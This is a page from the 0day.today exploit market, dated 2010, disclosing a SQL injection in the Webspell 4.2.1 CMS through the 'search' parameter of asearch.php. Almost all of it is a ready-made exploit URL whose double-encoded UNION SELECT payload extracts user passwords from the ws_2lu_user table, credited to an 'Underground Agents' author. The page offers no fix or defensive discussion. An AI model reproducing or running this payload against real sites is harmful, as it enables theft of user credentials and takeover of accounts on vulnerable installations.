[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Webspell 4.2.1 asearch.php SQL Injection Vulnerability

Author
silent vapor
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-14261
Category
web applications
Date add
30-09-2010
Platform
php
======================================================
Webspell 4.2.1 asearch.php SQL Injection Vulnerability
======================================================

################# INFORMATION ##################################################
+Name : webspell 4.2.1 asearch.php SQL Injection Vulnerability
+Author : silent vapor
+Date   : 29.09.2010
+Script  : webspell 4.2.1
+Price : free
+Language :PHP
+Discovered by silent vapor
+Underground Agents
+Greetz to Team-Internet, 4004-Security-Project, Easy Laster
################################################################################
 
+Vulnerability : http://localhost/webspell/asearch.php?site=search&table=user&
column=nickname&exact=true&identifier=userID&searchtemp=search_user&search=
 
+Exploitable   : http://localhost/webspell/asearch.php?site=search&table=user&
column=nickname&exact=true&identifier=userID&searchtemp=search_user&search=
admin%2527%20UNION+/**/+SELECT%201,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,
1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1%20FROM
%20ws_2lu_user%20WHERE%20%25271%2527=%25271
 
################################################################################



#  0day.today [2024-11-15]  #